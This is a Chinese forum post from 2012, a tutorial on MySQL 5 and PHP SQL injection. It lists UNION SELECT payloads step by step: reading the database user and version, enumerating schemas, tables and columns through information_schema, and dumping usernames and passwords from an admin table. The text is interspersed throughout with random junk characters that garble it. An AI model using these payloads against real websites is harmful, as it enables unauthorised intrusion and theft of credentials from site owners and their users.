7 t9 W. j f; Z: q教程内容:Mysql 5+php 注入; V; r' _$ P0 ^. f l1 s7 h
. U H( Q' c) a# N
4 ~. v$ q% I( W( @7 i; Z! t
/ _& j( ~1 |9 O: U2 q+ k5 J一.查看MYSQL基本信息(库名,版本,用户)
* d: o. r, Y9 v- @8 a) D
/ ^2 G+ N. S8 u3 e8 a f" a# oand 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
% k& E9 z/ U8 P/ r3 h
5 l+ ~ l' y/ G% L二.查数据库" M8 G6 m9 | _/ |4 D2 T
# B; H9 o# A( I- M6 ?$ T5 \& `
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
6 c* Z# v' a0 Z1 q1 d/ d; }! c0 c' \limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。. U) f& {6 Z7 ]$ T
/ O% m0 z8 Z$ J
三.暴表9 x* @- j" V' `" W; p
2 j! C L) H( q) W) d9 t+ wand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/** P3 J7 a2 b, I! M# j
/ T- W! |* r9 ?6 b
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
% D2 H6 j4 Z: r( r
3 o# ^" k) t _) ?, c0 c3 P四.暴字段2 Q" L: r Y4 Y( M4 K
% T; L7 X) ~8 a, ]
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
; [; F, _3 R- w
$ t0 `: s) ?2 E5 a$ Ilimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
# J2 A3 o D& H( _: ?4 S! I) i' n. ]6 {: F8 |
五.暴数据7 N* w+ B+ ^% k: c3 A
$ j2 R( u, b. ]* z% X, k
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
9 r3 x+ a+ ], e4 G B C d* I- f3 F( w& c6 Y
5 l1 H6 B+ a7 M这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。" Q$ a1 c+ Z" x) w) Q1 o }
|
发表于 2012-9-13 16:27:53
收藏
支持
反对